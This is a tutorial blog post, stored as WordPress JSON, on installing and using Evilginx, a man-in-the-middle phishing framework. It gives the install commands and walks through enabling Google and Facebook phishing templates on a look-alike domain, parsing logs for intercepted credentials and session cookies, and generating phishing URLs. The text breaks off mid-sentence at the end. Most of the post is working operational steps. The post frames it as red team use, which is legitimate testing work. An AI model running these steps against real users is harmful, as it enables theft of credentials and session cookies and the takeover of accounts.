{"id":1701,"date":"2018-06-22T07:51:38","date_gmt":"2018-06-22T02:21:38","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=1701"},"modified":"2018-06-22T07:51:38","modified_gmt":"2018-06-22T02:21:38","slug":"evilginx-mitm-attack","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/","title":{"rendered":"Evilginx – MITM Attack Framework For Phishing Credentials & Session Cookies"},"content":{"rendered":"

Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It’s core runs on Nginx HTTP server, which utilizes proxy_pass<\/code> and sub_filter<\/code> to proxy and modify HTTP content, while intercepting traffic between client and server.<\/span><\/p>\n

Installing Evilginx<\/strong><\/span><\/h2>\n

Evilginx provides an installation script install.sh<\/code> that takes care of installing the whole package on any Debian wheezy\/jessie machine, in fire and forget manner.<\/p>\n

Also Read<\/span>\u00a0Ghost Phisher \u2013 Wireless & Ethernet Attack Software Application<\/a><\/strong><\/p>\n

git clone https:\/\/github.com\/kgretzky\/evilginx<\/span>\ncd evilginx\nchmod 700 install.sh\n.\/install.sh\n<\/span><\/code><\/strong><\/span><\/pre>\n
Usage<\/span><\/strong><\/h2>\n
            _ _       _            \n           (_) |     (_)           \n  _____   ___| | __ _ _ _ __ __  __\n \/ _ \\ \\ \/ \/ | |\/ _` | | '_ \\\\ \\\/ \/\n|  __\/\\ V \/| | | (_| | | | | |>  < \n \\___| \\_\/ |_|_|\\__, |_|_| |_\/_\/\\_\\\n                 __\/ |            <\/span> \n by @mrgretzky  |___\/          v1.0\n\nusage: evilginx.py [-h] {setup,parse,genurl} ...<\/span>\n\npositional arguments:\n  {setup,parse,genurl}\n    setup               Configure Evilginx.\n    parse               Parse log file(s).\n    genurl              Generate phishing URL.\n\noptional arguments:\n  -h, --help            show this help message and exit\n<\/span><\/code><\/span><\/strong><\/pre>\n
Setup<\/strong><\/span><\/h2>\n
Enable or disable site configurations for use with Nginx server, using supplied Evilginx templates from sites<\/code> directory.<\/p>\n
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]\n                         (-l | --enable ENABLE | --disable DISABLE)\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -d DOMAIN, --domain DOMAIN\n                        Your phishing domain.\n  -y                    Answer all questions with 'Yes'.\n  -l, --list            List available supported apps.\n  --enable ENABLE       Enable following site by name.\n  --disable DISABLE     Disable following site by name.\n<\/strong><\/code><\/pre>\n
List available site configuration templates:<\/strong><\/p>\n
python evilginx.py setup -l<\/strong><\/code><\/pre>\n
Listing available supported sites:<\/strong>
\n- dropbox (\/root\/evilginx\/sites\/dropbox\/config)
\nsubdomains: www
\n<\/strong>
\n- google (\/root\/evilginx\/sites\/google\/config)
\nsubdomains: accounts, ssl
\n<\/strong>
\n- facebook (\/root\/evilginx\/sites\/facebook\/config)
\nsubdomains: www, m
\n<\/strong>
\n- linkedin (\/root\/evilginx\/sites\/linkedin\/config)
\nsubdomains: www<\/strong><\/code><\/p>\n
Enable google phishing site with preregistered phishing domain <\/strong>not-really-google.com<\/strong><\/code>:<\/strong><\/p>\n
python evilginx.py<\/strong><\/span> setup --enable google -d not-really-google.com\n<\/span><\/strong><\/code><\/pre>\n
Disable facebook phishing site:<\/strong><\/p>\n
python evilginx.py<\/span> setup --disable facebook\n<\/span><\/code><\/strong><\/span><\/pre>\n
Parse<\/strong><\/span><\/h3>\n
Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in logs<\/code> directory, where evilginx.py<\/code> script resides. This can be done automatically after you enable auto-parsing in the Setup<\/strong> phase.<\/p>\n
usage: evilginx.py parse [-h] -s SITE [--debug]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs\n                        for all sites).\n  --debug               Does not truncate log file after parsing.\n<\/span><\/code><\/strong><\/pre>\n
Parse logs only for google site:<\/strong><\/p>\n
python evilginx.py<\/span> parse -s google\n<\/span><\/strong><\/code><\/pre>\n
Parse logs for all available sites:<\/strong><\/p>\n
python evilginx.py<\/span> parse -s all\n<\/span><\/code><\/strong><\/span><\/pre>\n
Generate URL<\/strong><\/h3>\n
Generate phishing URLs that you can use in your Red Team Assessments.<\/strong><\/p>\n
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SITE, --site SITE  Name of site to generate link for.\n  -r REDIRECT, --redirect REDIRECT\n                        Redirect user to this URL after successful sign-in.\n<\/strong><\/span><\/code><\/pre>\n
\n
\n
\n
\n
\n
\n
Generate google phishing URL that will redirect victim to rick’roll video on successful login:<\/strong><\/p>\n
python evilginx.py genurl -s google<\/span> -r https:\/\/www.youtube.com\/watch?v=dQw4w9WgXcQ<\/span><\/code><\/strong><\/span><\/pre>\n<\/article>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n
Generated following phishing URLs:<\/strong><\/p>\n